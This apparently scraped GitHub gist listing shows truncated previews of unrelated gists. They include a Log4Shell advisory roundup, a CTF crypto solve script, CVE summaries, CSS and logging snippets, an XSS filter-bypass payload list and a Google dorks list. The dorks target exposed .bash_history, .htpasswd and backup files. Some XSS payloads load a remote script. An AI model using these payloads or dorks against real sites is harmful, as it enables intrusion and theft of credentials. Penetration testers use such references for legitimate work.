KTZgraph

🎯
Focusing on React, UX, UI
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active March 11, 2026 09:27
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@yytasbag
yytasbag / solve.sage
Created July 12, 2020 07:40
TSGCTF 2020 beginner crypto
from Crypto.Util.number import *
# calculate the solution to 2^10000 * x = 1002773875431658367671665822006771085816631054109509173556585546508965236428620487083647585179992085437922318783218149808537210712780660412301729655917441546549321914516504576 mod 5^174
R.<x> = PolynomialRing(Integers(5^174), implementation='NTL')
f = 2^10000 * x - 1002773875431658367671665822006771085816631054109509173556585546508965236428620487083647585179992085437922318783218149808537210712780660412301729655917441546549321914516504576
print(f.monic())
flag = R(-40911366519048706766028794026595817244329662170458953600729420435667708075268681595360226681630085247360526719063455282924)
print(flag)
flag = long_to_bytes(850582076141850204917088272646087112157789081182432304925852879338520690155230258866308530234671754970789752036398232701)
print(flag)
CVE-2018-18405:
jQuery v2.2.2 allows XSS via a crafted onerror attribute of an IMG element.
Reference: https://owasp.org/www-community/attacks/xss/ -
https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/ -
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md -
CVE-2019-19517:
Intelbras RF1200 1.1.3 devices allow CSRF to perform authentication on
login.html without needing to access the login interface, enabling brute force and
Description: JYaml through 1.3 allows remote code execution during deserialization of a malicious payload through the load() function. NOTE: this is a discontinued product.
VulnerabilityType: CWE-502: Deserialization of Untrusted Data
Vendor of Product: http://jyaml.sourceforge.net (see yaml.org)
Affected Product Code Base: jyaml Java library
Attack Type: Remote
@radist2s
radist2s / bem-and-sass.md
Created March 25, 2019 15:07
BEM & SASS best practices

BEM & SASS best practices

Every block should be in a separate file named after the block.

Filename: rating-star.scss

.rating-star {
    $font-size: 0.5em;
    
    display: inline-block; // `display` style may be set freely
from __future__ import unicode_literals
import logging
# built-in attributes on LogRecord. Used to determine what is passed in `extras`
RESERVED_ATTRS = (
'args', 'asctime', 'created', 'exc_info', 'exc_text', 'filename',
'funcName', 'levelname', 'levelno', 'lineno', 'module',
'msecs', 'message', 'msg', 'name', 'pathname', 'process',
'processName', 'relativeCreated', 'stack_info', 'thread', 'threadName')
@ipmb
ipmb / settings.py
Last active October 24, 2025 14:36
Django logging example
import logging.config
import os
from django.utils.log import DEFAULT_LOGGING
# Disable Django's logging setup
LOGGING_CONFIG = None
LOGLEVEL = os.environ.get('LOGLEVEL', 'info').upper()
logging.config.dictConfig({
# -*- coding: utf-8 -*-
import json
import requests
import re
import random
import urllib
import lxml.html
import bs4
import sys
reload(sys)
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active December 5, 2025 11:24
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@heiswayi
heiswayi / google-dorks-2015.txt
Created October 26, 2015 07:14
Google Dorks List 2015
intitle:index.of .bash_history
intitle:index.of .sh_history
intitle:"Index of" index.html.bak
intitle:"Index of" index.php.bak
intitle:"Index of" index.jsp.bak
intitle:"Index of" ".htpasswd" htpasswd.bak
inurl:backup intitle:index.of inurl:admin
"Index of /backup"
intitle:"Index of" index.html~
intitle:"Index of" index.php~